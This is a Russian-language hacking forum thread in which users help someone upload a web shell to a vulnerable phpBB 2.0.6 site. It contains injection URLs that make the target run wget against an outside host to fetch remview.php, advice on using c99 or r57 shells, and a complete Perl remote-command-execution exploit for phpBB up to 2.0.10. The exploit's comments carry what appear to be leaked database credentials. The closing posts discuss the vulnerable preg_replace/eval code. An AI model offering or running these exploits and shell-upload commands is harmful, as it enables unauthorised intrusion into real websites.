Здравствуйте житили античата,я квам пришол с такой проблемой...прошу мою проблему не отвергать а ответить на нее... Есть форум phpBB 2.0.6 уязвим но как тока я хочю залить на него шелл вот такой команндой: &highlight=%2527.$poster=`$cmd`.%2527&cmd=wget xxxx.x.xx/remview.php -P home/www/forum/ то оно сначала грузит грузит а потом резко остонавлеваеться и неможет загрузить,я думал что оно шелл залило хахожу по ссылки www.site.ru/forum/remview.php а сайт говорит что такого файла нету,значит выходит с этого что шелл НЕ ЗАЛИЛСЯ !!! и еще когда пробую GET заливать тоже самое.. Ответте мне на токую проблему пожалуста.... как можно прито-ком залить шелл ???
Ну...вы, батенька, напишите адресок форума, а мы (я точно) постараемся вам в этом "нелёгком" деле помочь. Пиши хотя бы в асю, если тут боязно. Кстати, кто сказал, что там WGET работает???
Если wget работает wget -o home/www/forum/Nazvanie_Faila.php http://xxxx.x.xx/remview.php Плюс попробуй изменить расширение шелла на твоём сайте на txt.
проверь какая качалка стоит на сайте which wget (curl,get,fetch) посмотри какие у тебя права (id) и убедись что папка в которую хочешь залить шелл открыта для записи,проверь правильность пути куда будешь заливать ессли в другую папку. и воще remview.php имхо ужанно неудобный шел лучше заюзать c99 или последнюю версию r57.
Конечно это то, вон там пример использования get. Ещё про комманды можно прочитать тут http://forum.antichat.ru/thread7345.html
ded2006 епт используй эксплоит все будут работать и к 10 и к 15 и 18 версиям! Вот тебе блин все что хочешь ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 Code: #!/usr/bin/perl ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam... ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## fucking lamaz... ## ## ccteam.ru ## $dbname = "ccteam_phpbb2"; ## $dbuser = "ccteam_userphpbb"; ## $dbpasswd = "XCbRsoy1"; ## ## eat this dude... ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if ( @ARGV < 4) { print q(############################################################ phpBB <=2.0.10 remote command execution exploit by RusH security team // www.rst.void.ru ############################################################ usage: r57phpbb2010.pl [URL] [DIR] [NUM] [CMD] params: [URL] - server url e.g. www.phpbb.com [DIR] - directory where phpBB installed e.g. /phpBB/ or / [NUM] - number of existing topic [CMD] - command for execute e.g. ls or "ls -la" ############################################################ ); exit; } $serv = $ARGV[0]; $dir = $ARGV[1]; $topic = $ARGV[2]; $cmd = $ARGV[3]; $serv =~ s/(http:\/\/)//eg; print "*** CMD: [ $cmd ]\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; $cmd=~ s/(.*);$/$1/eg; $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $path = $dir; $path .= 'viewtopic.php?t='; $path .= $topic; $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20'; $path .= $cmd; $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'; $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54% 5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n"; print $socket "GET $path HTTP/1.1\n"; print $socket "Host: $serv\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; $on = 0; while ($answer = <$socket>) { if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); } if ($on == 1) { print " $answer"; } if ($answer =~ /^_START_/) { $on = 1; } } print "[-] EXPLOIT FAILED\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; ### EOF ### Качай Активе перд и пользуйся. Не ломай бошку всякими загрузками шелла
Сначала читай посты, прежде чем писать. Сплойт работает ДО 10 ВЕРСИИ ВКЛЮЧИТЕЛЬНО. причем этот сплойт там не работает. Есть более хорошая статья, но не всем доступна...
Бу вот ребята а что вы будете делать если на php safe mode, и нельзя команды выполнять? вот чтоб подобных траблов не было, проще сразу проинклудить вебшел. Так как видно что бага представляет собой php injection, делаем типа так:
а я ниче непонял=))) qBiN да если у него и так команды выполняются то нах скуль ему тем более как mysql позволит выполнить пхп команды??=)) и во-вторых бага там в хреновом использовании eval() =)))
вот сейчас специально для вас двоих- zaco и qbin, потрудился нашел старую версию phpbb , и вот представляю вам на обозрение тот самый уязвимый код из файла viewtopic.php: PHP: $highlight_match = $highlight = '';if (isset($HTTP_GET_VARS['highlight'])){ // Split words and phrases $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight'])))); for($i = 0; $i < sizeof($words); $i++) { if (trim($words[$i]) != '') { $highlight_match .= (($highlight_match != '') ? '|' : '') . str_replace('*', '\w*', $words[$i]); } } unset($words); $highlight = urlencode($HTTP_GET_VARS['highlight']);} PHP: if ($highlight_match) { // This was shamelessly 'borrowed' from volker at multiartstudio dot de // via php.net's annotated manual $message = str_replace('\"', '"', substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "preg_replace('#\b(" . $highlight_match . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1)); } теперьто вы мне поверите?
нене ты думаешь как код выполняется? прег репласе - первая ошибка... а там уже в eval выполняется, ну эт конечно правильно если бы регулярные выражения грамматно настроили то все было бы безопасно+)))... просто имхо eval вообще опасная штука=)
